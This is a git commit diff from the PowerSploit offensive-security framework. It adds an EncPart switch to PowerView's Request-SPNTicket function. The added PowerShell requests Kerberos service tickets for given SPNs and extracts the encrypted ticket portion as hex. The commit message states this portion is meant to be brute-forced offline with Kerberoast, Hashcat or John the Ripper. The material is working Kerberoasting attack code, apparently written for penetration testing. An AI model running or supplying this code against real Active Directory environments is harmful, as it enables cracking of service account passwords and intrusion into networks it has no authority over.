diff options
| author | Matan Hart <matan.hart@cyberark.com> | 2016-08-25 12:27:15 +0300 |
|---|---|---|
| committer | GitHub <noreply@github.com> | 2016-08-25 12:27:15 +0300 |
| commit | 432cc017baf1f71732675058b1e090fc23714f08 (patch) | |
| tree | 241dee29841d5466e97491422d64254e196254ba /Recon/PowerView.ps1 | |
| parent | 869badc7f159d5bb772c2fe042c7b8f413c6f698 (diff) | |
| download | PowerSploit-432cc017baf1f71732675058b1e090fc23714f08.tar.gz PowerSploit-432cc017baf1f71732675058b1e090fc23714f08.zip | |
Add the EncPart param to Request-SPNTicket
Adds the ability to return the encrypted part of the ticket.
This portion is the encrypted data that can be brute-forced with Kerberoast/Hashcat/JtR
Diffstat (limited to 'Recon/PowerView.ps1')
| -rwxr-xr-x | Recon/PowerView.ps1 | 31 |
1 files changed, 29 insertions, 2 deletions
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index 27f87c7..d779cfa 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -1321,12 +1321,22 @@ function Request-SPNTicket { .PARAMETER SPN The service principal name to request the ticket for. Required. + + .PARAMETER EncPart + + Switch. Return the encrypted portion of the ticket (cipher). .EXAMPLE PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" Request a kerberos service ticket for the specified SPN. + + .EXAMPLE + + PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart + + Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket. .EXAMPLE @@ -1346,7 +1356,11 @@ function Request-SPNTicket { [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)] [Alias('ServicePrincipalName')] [String[]] - $SPN + $SPN, + + [Alias('EncryptedPart')] + [Switch] + $EncPart ) begin { @@ -1356,7 +1370,20 @@ function Request-SPNTicket { process { ForEach($UserSPN in $SPN) { Write-Verbose "Requesting ticket for: $UserSPN" - New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + if (!$EncPart) { + New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + } + else { + $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN + $TicketByteStream = $Ticket.GetRequest() + if ($TicketByteStream) + { + $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-" + [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201" + $Parts.RemoveAt($Parts.Count - 1) + $Parts -join "A48201" + } + } } } } |